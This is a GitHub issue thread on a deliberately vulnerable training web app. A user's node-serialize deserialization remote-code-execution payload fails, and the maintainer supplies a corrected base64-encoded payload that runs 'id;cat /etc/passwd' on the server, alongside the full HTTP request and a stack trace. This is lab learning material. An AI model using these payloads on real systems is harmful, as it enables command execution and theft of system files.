search

snoopysecurity / dvws-node

Damn Vulnerable Web Services is a vulnerable application with a web service and an API that can be used to learn about webservices/API related vulnerabilities.
GNU General Public License v3.0
455 stars 179 forks source link

Error on unsafe deserialization #33

Closed halfluke closed 2 years ago

halfluke commented 2 years ago

POST /api/v2/export HTTP/1.1 Host: dvws.local Content-Length: 146 accept: application/json; charset=utf-8 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJwZXJtaXNzaW9ucyI6WyJ1c2VyOnJlYWQiLCJ1c2VyOndyaXRlIiwidXNlcjphZG1pbiJdLCJpYXQiOjE2NTkzMDk3NzQsImV4cCI6MTY1OTQ4MjU3NCwiaXNzIjoiaHR0cHM6Ly9naXRodWIuY29tL3Nub29weXNlY3VyaXR5In0.3tRmhuvBy609M8WSRMdRVExdSbrwHN7sGvWMgdZ0jG8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Content-Type: application/json Origin: http://dvws.local Referer: http://dvws.local/api-docs/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close

{ "rce": "_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

Getting:

HTTP/1.1 500 Internal Server Error X-Powered-By: Express Access-Control-Allow-Origin: http://dvws.local Vary: Origin Access-Control-Allow-Credentials: true Cache-Control: no-store, no-cache, must-revalidate, private Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Content-Length: 1782 Date: Sun, 31 Jul 2022 23:40:23 GMT Connection: close

<!DOCTYPE html>

Error 
TypeError [ERR_INVALID_ARG_TYPE]: The first argument must be of type string or an instance of Buffer, ArrayBuffer, or Array or an Array-like Object. Received undefined
    at new NodeError (node:internal/errors:372:5)
    at Function.from (node:buffer:323:9)
    at export (/home/dvws-node/controllers/passphrase.js:76:22)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/dvws-node/node_modules/express/lib/router/route.js:144:13)
    at validateToken (/home/dvws-node/utils.js:18:9)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
    at next (/home/dvws-node/node_modules/express/lib/router/route.js:144:13)
    at Route.dispatch (/home/dvws-node/node_modules/express/lib/router/route.js:114:3)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
    at /home/dvws-node/node_modules/express/lib/router/index.js:284:15
    at Function.process_params (/home/dvws-node/node_modules/express/lib/router/index.js:346:12)
    at next (/home/dvws-node/node_modules/express/lib/router/index.js:280:10)
    at Function.handle (/home/dvws-node/node_modules/express/lib/router/index.js:175:3)
    at router (/home/dvws-node/node_modules/express/lib/router/index.js:47:12)
    at Layer.handle [as handle_request] (/home/dvws-node/node_modules/express/lib/router/layer.js:95:5)
snoopysecurity commented 2 years ago

Here the API endpoint is expecting a data parameter with base64 encoded data. You will need to send your payload as 


{"data":"eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lkO2NhdCAvZXRjL3Bhc3N3ZCcsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9"}

apisec

halfluke commented 2 years ago

Ah, thank you for clarifying this!